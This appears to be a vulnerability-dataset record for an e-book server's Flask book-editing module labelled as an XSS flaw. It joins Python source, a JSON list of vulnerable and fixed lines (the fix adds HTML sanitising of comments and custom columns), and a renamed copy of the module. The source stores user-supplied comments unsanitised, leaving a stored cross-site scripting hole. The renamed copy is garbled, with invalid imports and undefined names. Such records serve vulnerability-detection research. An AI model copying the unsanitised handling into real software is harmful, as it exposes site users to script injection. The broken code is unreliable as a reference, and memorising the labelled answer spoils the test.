        copyfile(coverfile, new_coverpath)
        if meta.cover:
            os.unlink(meta.cover)
    except OSError as e:
        log.error("Failed to move cover file %s: %s", new_coverpath, e)
        flash(_(u"Failed to Move Cover File %(file)s: %(error)s", file=new_coverpath,
                error=e),
              category="error")
@editbook.route("/upload", methods=["GET", "POST"])
@login_required_if_no_ano
@upload_required
def upload():
    """Handle the upload of one or more book files.

    Every file is validated, parsed for metadata, registered in the Calibre
    database and moved into the library directory. Responds with a JSON
    object whose 'location' the client should navigate to: the edit page
    (single upload by an editor), the detail page, or the index on error.
    """
    if not config.config_uploading:
        abort(404)
    if request.method == 'POST' and 'btn-upload' in request.files:
        for requested_file in request.files.getlist("btn-upload"):
            try:
                modif_date = False
                # create the function for sorting...
                calibre_db.update_title_sort(config)
                # Expose uuid4() to the raw sqlite connection for default UUIDs.
                calibre_db.session.connection().connection.connection.create_function('uuid4', 0, lambda: str(uuid4()))
                meta, error = file_handling_on_upload(requested_file)
                if error:
                    return error
                db_book, input_authors, title_dir = create_book_on_upload(modif_date, meta)
                # Comments needs book id therefore only possible after flush
                modif_date |= edit_book_comments(Markup(meta.description).unescape(), db_book)
                book_id = db_book.id
                title = db_book.title
                error = helper.update_dir_structure_file(book_id,
                                                         config.config_calibre_dir,
                                                         input_authors[0],
                                                         meta.file_path,
                                                         title_dir + meta.extension.lower())
                move_coverfile(meta, db_book)
                # save data to database, reread data
                calibre_db.session.commit()
                if config.config_use_google_drive:
                    gdriveutils.updateGdriveCalibreFromLocal()
                if error:
                    flash(error, category="error")
                uploadText=_(u"File %(file)s uploaded", file=title)
                WorkerThread.add(current_user.name, TaskUpload(
                    "<a href=\"" + url_for('web.show_book', book_id=book_id) + "\">" + uploadText + "</a>"))
                # A single upload jumps straight to the new book's page.
                if len(request.files.getlist("btn-upload")) < 2:
                    if current_user.role_edit() or current_user.role_admin():
                        resp = {"location": url_for('editbook.edit_book', book_id=book_id)}
                        return Response(json.dumps(resp), mimetype='application/json')
                    else:
                        resp = {"location": url_for('web.show_book', book_id=book_id)}
                        return Response(json.dumps(resp), mimetype='application/json')
            except (OperationalError, IntegrityError) as e:
                calibre_db.session.rollback()
                log.error("Database error: %s", e)
                flash(_(u"Database error: %(error)s.", error=e), category="error")
    return Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
@editbook.route("/admin/book/convert/<int:book_id>", methods=['POST'])
@login_required_if_no_ano
@edit_required
def convert_bookformat(book_id):
    """Queue a conversion of one book from one format to another."""
    # check to see if we have form fields to work with - if not send user back
    book_format_from = request.form.get('book_format_from', None)
    book_format_to = request.form.get('book_format_to', None)
    if book_format_from is None or book_format_to is None:
        flash(_(u"Source or destination format for conversion missing"), category="error")
        return redirect(url_for('editbook.edit_book', book_id=book_id))
    log.info('converting: book id: %s from: %s to: %s', book_id, book_format_from, book_format_to)
    rtn = helper.convert_book_format(book_id, config.config_calibre_dir, book_format_from.upper(),
                                     book_format_to.upper(), current_user.name)
    # A non-None return value is an error description from the converter.
    if rtn is not None:
        flash(_(u"There was an error converting this book: %(res)s", res=rtn), category="error")
    else:
        flash(_(u"Book successfully queued for converting to %(book_format)s",
                book_format=book_format_to),
              category="success")
    return redirect(url_for('editbook.edit_book', book_id=book_id))
@editbook.route("/scholarsearch/<query>",methods=['GET'])
@login_required_if_no_ano
@edit_required
def scholar_search(query):
    """Return up to ten Google Scholar results for *query* as JSON.

    Returns the literal string "[]" when the scholarly package is missing.
    """
    if not have_scholar:
        return "[]"
    scholar_gen = scholarly.search_pubs(' '.join(query.split('+')))
    result = []
    for count, publication in enumerate(scholar_gen, start=1):
        # Strip the non-serializable 'source' entry before returning.
        del publication['source']
        result.append(publication)
        if count >= 10:
            break
    return Response(json.dumps(result),mimetype='application/json')
@editbook.route("/ajax/editbooks/<param>", methods=['POST'])
@login_required_if_no_ano
@edit_required
def edit_list_book(param):
    """AJAX endpoint for the editable book table: update a single field.

    *param* names the edited column; the form carries 'pk' (book id) and
    'value'. Responds with a JSON object containing the new display value.
    """
    vals = request.form.to_dict()
    book = calibre_db.get_book(vals['pk'])
    ret = ""
    if param =='series_index':
        edit_book_series_index(vals['value'], book)
        ret = Response(json.dumps({'success': True, 'newValue': book.series_index}), mimetype='application/json')
    elif param =='tags':
        edit_book_tags(vals['value'], book)
        ret = Response(json.dumps({'success': True, 'newValue': ', '.join([tag.name for tag in book.tags])}),
                       mimetype='application/json')
    elif param =='series':
        edit_book_series(vals['value'], book)
        ret = Response(json.dumps({'success': True, 'newValue': ', '.join([serie.name for serie in book.series])}),
                       mimetype='application/json')
    elif param =='publishers':
        edit_book_publisher(vals['value'], book)
        ret = Response(json.dumps({'success': True,
                                   'newValue': ', '.join([publisher.name for publisher in book.publishers])}),
                       mimetype='application/json')
    elif param =='languages':
        invalid = list()
        edit_book_languages(vals['value'], book, invalid=invalid)
        if invalid:
            ret = Response(json.dumps({'success': False,
                                       'msg': 'Invalid languages in request: {}'.format(','.join(invalid))}),
                           mimetype='application/json')
        else:
            # Render each stored language code in the user's locale.
            lang_names = list()
            for lang in book.languages:
                try:
                    lang_names.append(LC.parse(lang.lang_code).get_language_name(get_locale()))
                except UnknownLocaleError:
                    lang_names.append(_(isoLanguages.get(part3=lang.lang_code).name))
            ret = Response(json.dumps({'success': True, 'newValue': ', '.join(lang_names)}),
                           mimetype='application/json')
    elif param =='author_sort':
        book.author_sort = vals['value']
        ret = Response(json.dumps({'success': True, 'newValue': book.author_sort}),
                       mimetype='application/json')
    elif param == 'title':
        # Remember the old sort value so it can be restored below when the
        # "link title/sort" checkbox is off.
        sort = book.sort
        handle_title_on_edit(book, vals.get('value', ""))
        helper.update_dir_stucture(book.id, config.config_calibre_dir)
        ret = Response(json.dumps({'success': True, 'newValue': book.title}),
                       mimetype='application/json')
    elif param =='sort':
        book.sort = vals['value']
        ret = Response(json.dumps({'success': True, 'newValue': book.sort}),
                       mimetype='application/json')
    elif param =='authors':
        input_authors, __ = handle_author_on_edit(book, vals['value'], vals.get('checkA', None) == "true")
        helper.update_dir_stucture(book.id, config.config_calibre_dir, input_authors[0])
        ret = Response(json.dumps({'success': True,
                                   'newValue': ' & '.join([author.replace('|',',') for author in input_authors])}),
                       mimetype='application/json')
    book.last_modified = datetime.utcnow()
    try:
        calibre_db.session.commit()
        # revert change for sort if automatic fields link is deactivated
        if param == 'title' and vals.get('checkT') == "false":
            book.sort = sort
            calibre_db.session.commit()
    except (OperationalError, IntegrityError) as e:
        calibre_db.session.rollback()
        log.error("Database error: %s", e)
    return ret
@editbook.route("/ajax/sort_value/<field>/<int:bookid>")
@login_required
def get_sorted_entry(field, bookid):
    """Return the stored sort value for one field of one book as JSON.

    Unknown fields or inaccessible books yield an empty string.
    """
    if field not in ('title', 'authors', 'sort', 'author_sort'):
        return ""
    book = calibre_db.get_filtered_book(bookid)
    if not book:
        return ""
    if field == 'title':
        return json.dumps({'sort': book.sort})
    if field == 'authors':
        return json.dumps({'author_sort': book.author_sort})
    if field == 'sort':
        return json.dumps({'sort': book.title})
    # field == 'author_sort'
    return json.dumps({'author_sort': book.author})
@editbook.route("/ajax/simulatemerge", methods=['POST'])
@login_required
@edit_required
def simulate_merge_list_book():
    """Preview a merge: report the target book's title and ALL source titles.

    Bug fix: ``from_book`` was previously re-initialized inside the loop, so
    the response only ever listed the LAST selected source book instead of
    every book that would be merged.
    """
    vals = request.get_json().get('Merge_books')
    if vals:
        to_book = calibre_db.get_book(vals[0]).title
        vals.pop(0)
        if to_book:
            # Collect the titles of every remaining (source) book.
            from_book = []
            for book_id in vals:
                from_book.append(calibre_db.get_book(book_id).title)
            return json.dumps({'to': to_book, 'from': from_book})
    return ""
@editbook.route("/ajax/mergebooks", methods=['POST'])
@login_required
@edit_required
def merge_list_book():
    """Merge several books into the first posted book id.

    Formats the target book does not yet have are copied on disk into the
    target's folder and registered as db.Data rows; each source book is then
    deleted. Responds with '{"success": true}' or an empty string when no
    usable book ids were posted.
    """
    vals = request.get_json().get('Merge_books')
    to_file = list()
    if vals:
        # load all formats from target book
        to_book = calibre_db.get_book(vals[0])
        vals.pop(0)
        if to_book:
            for file in to_book.data:
                to_file.append(file.format)
            # Target filename stem: "<title> - <first author>".
            to_name = helper.get_valid_filename(to_book.title) + ' - ' + \
                      helper.get_valid_filename(to_book.authors[0].name)
            for book_id in vals:
                from_book = calibre_db.get_book(book_id)
                if from_book:
                    for element in from_book.data:
                        # Only copy formats the target book is missing.
                        if element.format not in to_file:
                            # create new data entry with: book_id, book_format, uncompressed_size, name
                            filepath_new = os.path.normpath(os.path.join(config.config_calibre_dir,
                                                                         to_book.path,
                                                                         to_name + "." + element.format.lower()))
                            filepath_old = os.path.normpath(os.path.join(config.config_calibre_dir,
                                                                         from_book.path,
                                                                         element.name + "." + element.format.lower()))
                            copyfile(filepath_old, filepath_new)
                            to_book.data.append(db.Data(to_book.id,
                                                        element.format,
                                                        element.uncompressed_size,
                                                        to_name))
                    delete_book(from_book.id,"", True)
            return json.dumps({'success': True})
    return ""
@editbook.route("/ajax/xchange", methods=['POST'])
@login_required
@edit_required
def table_xchange_author_title():
    """Swap author and title for every book id posted under 'xchange'.

    Bug fix: ``edited_books_id`` is now initialized at the top of each loop
    iteration. Previously it was only assigned inside the
    ``if authorchange or title_change:`` branch, so the unconditional
    ``if edited_books_id:`` check raised UnboundLocalError whenever a book's
    swap produced no change.
    """
    vals = request.get_json().get('xchange')
    if vals:
        for val in vals:
            modif_date = False
            edited_books_id = None  # fix: always defined, even when nothing changed
            book = calibre_db.get_book(val)
            # The current title becomes the new author string (and vice versa).
            authors = book.title
            entries = calibre_db.order_authors(book)
            author_names = []
            for authr in entries.authors:
                author_names.append(authr.name.replace('|', ','))
            title_change = handle_title_on_edit(book, " ".join(author_names))
            input_authors, authorchange = handle_author_on_edit(book, authors)
            if authorchange or title_change:
                edited_books_id = book.id
                modif_date = True
            if config.config_use_google_drive:
                gdriveutils.updateGdriveCalibreFromLocal()
            # Rename the on-disk folder only when something actually changed.
            if edited_books_id:
                helper.update_dir_stucture(edited_books_id, config.config_calibre_dir, input_authors[0])
            if modif_date:
                book.last_modified = datetime.utcnow()
            try:
                calibre_db.session.commit()
            except (OperationalError, IntegrityError) as e:
                calibre_db.session.rollback()
                log.error("Database error: %s", e)
                return json.dumps({'success': False})
        if config.config_use_google_drive:
            gdriveutils.updateGdriveCalibreFromLocal()
        return json.dumps({'success': True})
    return ""
| xss | {
"code": [
"have_scholar = True",
" pass",
" book.comments[0].text = comments"
],
"line_no": [
31,
36,
464
]
} | {
"code": [
" have_scholar = True",
" if comments:",
" comments = clean_html(comments)",
" book.comments[0].text = clean_html(comments)",
" if to_save[cc_string]:",
" to_save[cc_string] = clean_html(to_save[cc_string])"
],
"line_no": [
34,
463,
464,
467,
521,
522
]
} |
from __future__ import division, print_function, unicode_literals
import os
from datetime import datetime
import json
from shutil import .copyfile
from uuid import uuid4
VAR_0 = True
try:
from scholarly import scholarly
except ImportError:
VAR_0 = False
pass
from babel import Locale as LC
from babel.core import UnknownLocaleError
from flask import Blueprint, VAR_32, flash, redirect, url_for, abort, Markup, Response
from flask_babel import gettext as _
from flask_login import .current_user, login_required
from sqlalchemy.exc import OperationalError, IntegrityError
from sqlite3 import OperationalError as sqliteOperationalError
from . import .constants, logger, isoLanguages, gdriveutils, uploader, helper
from . import .config, get_locale, ub, db
from . import .calibre_db
from .services.worker import WorkerThread
from .tasks.upload import TaskUpload
from .render_template import render_title_template
from .usermanagement import .login_required_if_no_ano
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
VAR_1 = Blueprint('editbook', __name__)
VAR_2 = logger.create()
def FUNC_0(VAR_3):
@wraps(VAR_3)
def FUNC_44(*VAR_46, **VAR_47):
if current_user.role_upload() or current_user.role_admin():
return VAR_3(*VAR_46, **VAR_47)
abort(403)
return FUNC_44
def FUNC_1(VAR_3):
@wraps(VAR_3)
def FUNC_44(*VAR_46, **VAR_47):
if current_user.role_edit() or current_user.role_admin():
return VAR_3(*VAR_46, **VAR_47)
abort(403)
return FUNC_44
def FUNC_2(VAR_4, VAR_5, VAR_6):
VAR_8 = []
for c_elements in VAR_4:
VAR_82 = False
if VAR_5 == 'languages':
VAR_101 = c_elements.lang_code
elif VAR_5 == 'custom':
VAR_101 = c_elements.value
else:
VAR_101 = c_elements.name
for inp_element in VAR_6:
if inp_element.lower() == VAR_101.lower():
VAR_82 = True
break
if not VAR_82:
VAR_8.append(c_elements)
return VAR_8
def FUNC_3(VAR_4, VAR_5, VAR_6):
VAR_10 = []
for inp_element in VAR_6:
VAR_82 = False
for c_elements in VAR_4:
if VAR_5 == 'languages':
VAR_101 = c_elements.lang_code
elif VAR_5 == 'custom':
VAR_101 = c_elements.value
else:
VAR_101 = c_elements.name
if inp_element == VAR_101:
VAR_82 = True
break
if not VAR_82:
VAR_10.append(inp_element)
return VAR_10
def FUNC_4(VAR_4, VAR_7, VAR_8):
VAR_48 = False
if len(VAR_8) > 0:
for del_element in VAR_8:
VAR_4.remove(del_element)
VAR_48 = True
if len(del_element.books) == 0:
VAR_7.delete(del_element)
return VAR_48
def FUNC_5(VAR_4, VAR_9, VAR_7, VAR_5, VAR_10):
VAR_48 = False
if VAR_5 == 'languages':
VAR_83 = VAR_9.lang_code
elif VAR_5 == 'custom':
VAR_83 = VAR_9.value
else:
VAR_83 = VAR_9.name
for VAR_12 in VAR_10:
VAR_11 = VAR_7.query(VAR_9).filter(VAR_83 == VAR_12).first()
if VAR_5 == 'author':
VAR_102 = VAR_9(VAR_12, helper.get_sorted_author(VAR_12.replace('|', ',')), "")
elif VAR_5 == 'series':
VAR_102 = VAR_9(VAR_12, add_element)
elif VAR_5 == 'custom':
VAR_102 = VAR_9(value=VAR_12)
elif VAR_5 == 'publisher':
VAR_102 = VAR_9(VAR_12, None)
else: # VAR_5 should be tag or language
VAR_102 = VAR_9(VAR_12)
if VAR_11 is None:
VAR_48 = True
VAR_7.add(VAR_102)
VAR_4.append(VAR_102)
else:
VAR_11 = FUNC_6(VAR_11, VAR_12, VAR_5)
VAR_48 = True
VAR_48 = True
VAR_4.append(VAR_11)
return VAR_48
def FUNC_6(VAR_11, VAR_12, VAR_5):
if VAR_5 == 'custom':
if VAR_11.value != VAR_12:
VAR_11.value = VAR_12 # ToDo: Before VAR_102, but this is not plausible
elif VAR_5 == 'languages':
if VAR_11.lang_code != VAR_12:
VAR_11.lang_code = VAR_12
elif VAR_5 == 'series':
if VAR_11.name != VAR_12:
VAR_11.name = VAR_12
VAR_11.sort = VAR_12
elif VAR_5 == 'author':
if VAR_11.name != VAR_12:
VAR_11.name = VAR_12
VAR_11.sort = VAR_12.replace('|', ',')
elif VAR_5 == 'publisher':
if VAR_11.name != VAR_12:
VAR_11.name = VAR_12
VAR_11.sort = None
elif VAR_11.name != VAR_12:
VAR_11.name = VAR_12
return VAR_11
def FUNC_7(VAR_6, VAR_4, VAR_9, VAR_7, VAR_5):
if not isinstance(VAR_6, list):
raise TypeError(str(VAR_6) + " should be passed as a list")
VAR_6 = [x for x in VAR_6 if x != '']
VAR_8 = FUNC_2(VAR_4, VAR_5, VAR_6)
VAR_10 = FUNC_3(VAR_4, VAR_5, VAR_6)
VAR_48 = FUNC_4(VAR_4, VAR_7, VAR_8)
if len(VAR_10) > 0:
VAR_48 |= FUNC_5(VAR_4, VAR_9, VAR_7, VAR_5, VAR_10)
return VAR_48
def FUNC_8(VAR_13, VAR_14, VAR_7):
VAR_48 = False
VAR_49 = False
VAR_50 = dict([(identifier.type.lower(), identifier) for identifier in VAR_13])
if len(VAR_13) != len(VAR_50):
VAR_49 = True
VAR_51 = dict([(identifier.type.lower(), identifier) for identifier in VAR_14 ])
for identifier_type, identifier in VAR_51.items():
if identifier_type not in VAR_50.keys():
VAR_7.delete(identifier)
VAR_48 = True
else:
VAR_103 = VAR_50[identifier_type]
identifier.type = VAR_103.type
identifier.val = VAR_103.val
for identifier_type, identifier in VAR_50.items():
if identifier_type not in VAR_51.keys():
VAR_7.add(identifier)
VAR_48 = True
return VAR_48, VAR_49
@VAR_1.route("/ajax/delete/<int:VAR_15>")
@login_required
def FUNC_9(VAR_15):
return Response(FUNC_13(VAR_15, "", True), mimetype='application/json')
@VAR_1.route("/delete/<int:VAR_15>", defaults={'book_format': ""})
@VAR_1.route("/delete/<int:VAR_15>/<string:VAR_16>")
@login_required
def FUNC_10(VAR_15, VAR_16):
return FUNC_13(VAR_15, VAR_16, False)
def FUNC_11(VAR_15, VAR_17):
ub.session.query(ub.BookShelf).filter(ub.BookShelf.book_id == VAR_15).delete()
ub.session.query(ub.ReadBook).filter(ub.ReadBook.book_id == VAR_15).delete()
ub.delete_download(VAR_15)
ub.session_commit()
FUNC_7([u''], VAR_17.authors, db.Authors, calibre_db.session, 'author')
FUNC_7([u''], VAR_17.tags, db.Tags, calibre_db.session, 'tags')
FUNC_7([u''], VAR_17.series, db.Series, calibre_db.session, 'series')
FUNC_7([u''], VAR_17.languages, db.Languages, calibre_db.session, 'languages')
FUNC_7([u''], VAR_17.publishers, db.Publishers, calibre_db.session, 'publishers')
VAR_52 = calibre_db.session.query(db.Custom_Columns). \
filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
for VAR_29 in VAR_52:
VAR_31 = "custom_column_" + str(VAR_29.id)
if not VAR_29.is_multiple:
if len(getattr(VAR_17, VAR_31)) > 0:
if VAR_29.datatype == 'bool' or VAR_29.datatype == 'integer' or VAR_29.datatype == 'float':
VAR_105 = getattr(VAR_17, VAR_31)[0]
getattr(VAR_17, VAR_31).remove(VAR_105)
VAR_2.debug('remove ' + str(VAR_29.id))
calibre_db.session.delete(VAR_105)
calibre_db.session.commit()
elif VAR_29.datatype == 'rating':
VAR_105 = getattr(VAR_17, VAR_31)[0]
getattr(VAR_17, VAR_31).remove(VAR_105)
if len(VAR_105.books) == 0:
VAR_2.debug('remove ' + str(VAR_29.id))
calibre_db.session.delete(VAR_105)
calibre_db.session.commit()
else:
VAR_105 = getattr(VAR_17, VAR_31)[0]
getattr(VAR_17, VAR_31).remove(VAR_105)
VAR_2.debug('remove ' + str(VAR_29.id))
calibre_db.session.delete(VAR_105)
calibre_db.session.commit()
else:
FUNC_7([u''], getattr(VAR_17, VAR_31), db.cc_classes[VAR_29.id],
calibre_db.session, 'custom')
calibre_db.session.query(db.Books).filter(db.Books.id == VAR_15).delete()
def FUNC_12(VAR_16, VAR_18, VAR_19, VAR_15):
if VAR_16:
if VAR_18:
return json.dumps([VAR_19, {"location": url_for("editbook.edit_book", VAR_15=book_id),
"type": "success",
"format": VAR_16,
"message": _('Book Format Successfully Deleted')}])
else:
flash(_('Book Format Successfully Deleted'), category="success")
return redirect(url_for('editbook.edit_book', VAR_15=book_id))
else:
if VAR_18:
return json.dumps([VAR_19, {"location": url_for('web.index'),
"type": "success",
"format": VAR_16,
"message": _('Book Successfully Deleted')}])
else:
flash(_('Book Successfully Deleted'), category="success")
return redirect(url_for('web.index'))
def FUNC_13(VAR_15, VAR_16, VAR_18):
VAR_19 = {}
if current_user.role_delete_books():
VAR_17 = calibre_db.get_book(VAR_15)
if VAR_17:
try:
VAR_68, VAR_49 = helper.delete_book(VAR_17, config.config_calibre_dir, VAR_16=book_format.upper())
if not VAR_68:
if VAR_18:
return json.dumps([{"location": url_for("editbook.edit_book", VAR_15=book_id),
"type": "danger",
"format": "",
"message": VAR_49}])
else:
flash(VAR_49, category="error")
return redirect(url_for('editbook.edit_book', VAR_15=book_id))
if VAR_49:
if VAR_18:
VAR_19 = {"location": url_for("editbook.edit_book", VAR_15=book_id),
"type": "warning",
"format": "",
"message": VAR_49}
else:
flash(VAR_49, category="warning")
if not VAR_16:
FUNC_11(VAR_15, VAR_17)
else:
calibre_db.session.query(db.Data).filter(db.Data.book == VAR_17.id).\
filter(db.Data.format == VAR_16).delete()
calibre_db.session.commit()
except Exception as ex:
VAR_2.debug_or_exception(ex)
calibre_db.session.rollback()
if VAR_18:
return json.dumps([{"location": url_for("editbook.edit_book", VAR_15=book_id),
"type": "danger",
"format": "",
"message": ex}])
else:
flash(str(ex), category="error")
return redirect(url_for('editbook.edit_book', VAR_15=book_id))
else:
VAR_2.error('Book with id "%s" could not be deleted: not found', VAR_15)
return FUNC_12(VAR_16, VAR_18, VAR_19, VAR_15)
def FUNC_14(VAR_15):
VAR_52 = calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
VAR_17 = calibre_db.get_filtered_book(VAR_15, allow_show_archived=True)
if not VAR_17:
flash(_(u"Oops! Selected VAR_17 VAR_37 is unavailable. File does not exist or is not accessible"), category="error")
return redirect(url_for("web.index"))
for lang in VAR_17.languages:
lang.language_name = isoLanguages.get_language_name(get_locale(), lang.lang_code)
VAR_17 = calibre_db.order_authors(VAR_17)
VAR_53 = []
for VAR_38 in VAR_17.authors:
VAR_53.append(VAR_38.name.replace('|', ','))
VAR_54=list()
VAR_55 = list()
VAR_56=None
if config.config_converterpath:
for file in VAR_17.data:
if file.format.lower() in constants.EXTENSIONS_CONVERT_FROM:
VAR_54.append(file.format.lower())
if config.config_kepubifypath and 'epub' in [file.format.lower() for file in VAR_17.data]:
VAR_56 = True
if not config.config_converterpath:
VAR_54.append('epub')
if config.config_converterpath:
VAR_55 = constants.EXTENSIONS_CONVERT_TO[:]
for file in VAR_17.data:
if file.format.lower() in VAR_55:
allowed_conversion_formats.remove(file.format.lower())
if VAR_56:
VAR_55.append('kepub')
return render_title_template('book_edit.html', VAR_17=book, VAR_115=VAR_53, VAR_52=cc,
VAR_37=_(u"edit metadata"), page="editbook",
conversion_formats=VAR_55,
config=config,
source_formats=VAR_54)
def FUNC_15(VAR_20, VAR_17):
VAR_48 = False
if VAR_20["rating"].strip():
VAR_84 = False
if len(VAR_17.ratings) > 0:
VAR_84 = VAR_17.ratings[0].rating
VAR_85 = int(float(VAR_20["rating"]) * 2)
if VAR_85 != VAR_84:
VAR_48 = True
VAR_104 = calibre_db.session.query(db.Ratings).filter(db.Ratings.rating == VAR_85).first()
if VAR_104:
VAR_17.ratings.append(VAR_104)
else:
VAR_117 = db.Ratings(rating=VAR_85)
VAR_17.ratings.append(VAR_117)
if VAR_84:
VAR_17.ratings.remove(VAR_17.ratings[0])
else:
if len(VAR_17.ratings) > 0:
VAR_17.ratings.remove(VAR_17.ratings[0])
VAR_48 = True
return VAR_48
def FUNC_16(VAR_21, VAR_17):
VAR_57 = VAR_21.split(',')
VAR_57 = list(map(lambda it: it.strip(), VAR_57))
VAR_57 = helper.uniq(VAR_57)
return FUNC_7(VAR_57, VAR_17.tags, db.Tags, calibre_db.session, 'tags')
def FUNC_17(VAR_22, VAR_17):
VAR_58 = [VAR_22.strip()]
VAR_58 = [x for x in VAR_58 if x != '']
return FUNC_7(VAR_58, VAR_17.series, db.Series, calibre_db.session, 'series')
def FUNC_18(VAR_23, VAR_17):
VAR_39 = False
VAR_23 = VAR_23 or '1'
if not VAR_23.replace('.', '', 1).isdigit():
flash(_("%(seriesindex)s is not a valid number, skipping", seriesindex=VAR_23), category="warning")
return False
if VAR_17.series_index != VAR_23:
VAR_17.series_index = VAR_23
VAR_39 = True
return VAR_39
def FUNC_19(VAR_24, VAR_17):
VAR_39 = False
if len(VAR_17.comments):
if VAR_17.comments[0].text != VAR_24:
VAR_17.comments[0].text = VAR_24
VAR_39 = True
else:
if VAR_24:
VAR_17.comments.append(db.Comments(text=VAR_24, VAR_17=VAR_17.id))
VAR_39 = True
return VAR_39
def FUNC_20(VAR_25, VAR_17, VAR_26=False, VAR_27=None):
    """Apply the comma-separated language list VAR_25 to book VAR_17.

    VAR_26 seems to flag the upload path (uses the stricter validator and may
    substitute the user's filter language) — TODO confirm.  When VAR_27 is a
    list, invalid language names are collected into it instead of flashed.
    Returns True when the book's languages changed.
    """
    VAR_59 = VAR_25.split(',')
    VAR_60 = []   # filled by the isoLanguages helpers with unrecognized names
    if not VAR_26:
        VAR_61 = isoLanguages.get_language_codes(get_locale(), VAR_59, VAR_60)
    else:
        VAR_61 = isoLanguages.get_valid_language_codes(get_locale(), VAR_59, VAR_60)
    for l in VAR_60:
        VAR_2.error('%s is not a valid language', l)
        if isinstance(VAR_27, list):
            VAR_27.append(l)
        else:
            flash(_(u"%(langname)s is not a valid language", langname=l), category="warning")
    # On upload with a single detected language, prefer the user's configured
    # filter language (unless it is "all").
    if VAR_26 and len(VAR_61) == 1:
        if VAR_61[0] != current_user.filter_language() and current_user.filter_language() != "all":
            VAR_61[0] = calibre_db.session.query(db.Languages). \
                filter(db.Languages.lang_code == current_user.filter_language()).first().lang_code
    VAR_61 = helper.uniq(VAR_61)
    return FUNC_7(VAR_61, VAR_17.languages, db.Languages, calibre_db.session, 'languages')
def FUNC_21(VAR_28, VAR_17):
    """Set (or clear, for empty input) the book's publisher.

    Returns True when the publisher relation changed.
    """
    VAR_48 = False
    if VAR_28:
        VAR_86 = VAR_28.rstrip().strip()
        # only touch the relation when the name actually differs
        if len(VAR_17.publishers) == 0 or (len(VAR_17.publishers) > 0 and VAR_86 != VAR_17.publishers[0].name):
            VAR_48 |= FUNC_7([VAR_86], VAR_17.publishers, db.Publishers, calibre_db.session,
                             'publisher')
    elif len(VAR_17.publishers):
        # empty input removes the existing publisher
        VAR_48 |= FUNC_7([], VAR_17.publishers, db.Publishers, calibre_db.session, 'publisher')
    return VAR_48
def FUNC_22(VAR_15, VAR_17, VAR_29, VAR_20, VAR_30, VAR_31):
    """Write a scalar custom-column value (int/bool/float/datetime/comments).

    VAR_29 is the column definition, VAR_30 the current stored value, VAR_31
    the form key ("custom_column_<id>").  Returns (changed, form_dict).
    """
    VAR_48 = False
    # normalize the raw form string into the column's native type
    if VAR_20[VAR_31] == 'None':
        VAR_20[VAR_31] = None
    elif VAR_29.datatype == 'bool':
        VAR_20[VAR_31] = 1 if VAR_20[VAR_31] == 'True' else 0
    elif VAR_29.datatype == 'comments':
        VAR_20[VAR_31] = Markup(VAR_20[VAR_31]).unescape()
    elif VAR_29.datatype == 'datetime':
        try:
            VAR_20[VAR_31] = datetime.strptime(VAR_20[VAR_31], "%Y-%m-%d")
        except ValueError:
            VAR_20[VAR_31] = db.Books.DEFAULT_PUBDATE
    if VAR_20[VAR_31] != VAR_30:
        if VAR_30 is not None:
            if VAR_20[VAR_31] is not None:
                # overwrite the existing custom-column row in place
                setattr(getattr(VAR_17, VAR_31)[0], 'value', VAR_20[VAR_31])
                VAR_48 = True
            else:
                # value cleared: detach and delete the row
                VAR_105 = getattr(VAR_17, VAR_31)[0]
                getattr(VAR_17, VAR_31).remove(VAR_105)
                calibre_db.session.delete(VAR_105)
                VAR_48 = True
        else:
            # no previous value: create a fresh row for this column class
            VAR_87 = db.cc_classes[VAR_29.id]
            VAR_88 = VAR_87(value=VAR_20[VAR_31], VAR_17=VAR_15)
            calibre_db.session.add(VAR_88)
            VAR_48 = True
    return VAR_48, VAR_20
def FUNC_23(VAR_17, VAR_29, VAR_20, VAR_30, VAR_31):
    """Write a relation-style custom-column value (text/rating/enumeration).

    Detaches the old linked row, then links an existing row with the new
    value or creates one.  Returns (changed, form_dict).
    """
    VAR_48 = False
    if VAR_29.datatype == 'rating':
        # ratings are stored doubled (half-star resolution)
        VAR_20[VAR_31] = str(int(float(VAR_20[VAR_31]) * 2))
    if VAR_20[VAR_31].strip() != VAR_30:
        if VAR_30 is not None:
            VAR_105 = getattr(VAR_17, VAR_31)[0]
            getattr(VAR_17, VAR_31).remove(VAR_105)
            # garbage-collect the old row if no other book references it
            if len(VAR_105.books) == 0:
                calibre_db.session.delete(VAR_105)
                VAR_48 = True
        VAR_87 = db.cc_classes[VAR_29.id]
        VAR_88 = calibre_db.session.query(VAR_87).filter(
            VAR_87.value == VAR_20[VAR_31].strip()).first()
        if VAR_88 is None:
            VAR_88 = VAR_87(value=VAR_20[VAR_31].strip())
            calibre_db.session.add(VAR_88)
            VAR_48 = True
            # flush so the re-query below sees the freshly added row
            calibre_db.session.flush()
            VAR_88 = calibre_db.session.query(VAR_87).filter(
                VAR_87.value == VAR_20[VAR_31].strip()).first()
        getattr(VAR_17, VAR_31).append(VAR_88)
    return VAR_48, VAR_20
def FUNC_24(VAR_15, VAR_17, VAR_20):
    """Apply all custom-column form fields in VAR_20 to book VAR_17.

    Dispatches scalar columns to FUNC_22, relation columns to FUNC_23 and
    multi-value columns to FUNC_7.  Returns the changed flag.
    """
    VAR_48 = False
    VAR_52 = calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
    for VAR_29 in VAR_52:
        VAR_31 = "custom_column_" + str(VAR_29.id)
        if not VAR_29.is_multiple:
            if len(getattr(VAR_17, VAR_31)) > 0:
                VAR_30 = getattr(VAR_17, VAR_31)[0].value
            else:
                VAR_30 = None
            if VAR_20[VAR_31].strip():
                if VAR_29.datatype in ['int', 'bool', 'float', "datetime", "comments"]:
                    # NOTE(review): the changed flag is overwritten (not OR-ed)
                    # per column — a change in an earlier column can be masked.
                    VAR_48, VAR_20 = FUNC_22(VAR_15, VAR_17, VAR_29, VAR_20, VAR_30, VAR_31)
                else:
                    VAR_48, VAR_20 = FUNC_23(VAR_17, VAR_29, VAR_20, VAR_30, VAR_31)
            else:
                # empty field clears an existing value
                if VAR_30 is not None:
                    VAR_105 = getattr(VAR_17, VAR_31)[0]
                    getattr(VAR_17, VAR_31).remove(VAR_105)
                    if not VAR_105.books or len(VAR_105.books) == 0:
                        calibre_db.session.delete(VAR_105)
                    VAR_48 = True
        else:
            # multi-value column: comma separated list handled like tags
            VAR_57 = VAR_20[VAR_31].split(',')
            VAR_57 = list(map(lambda it: it.strip(), VAR_57))
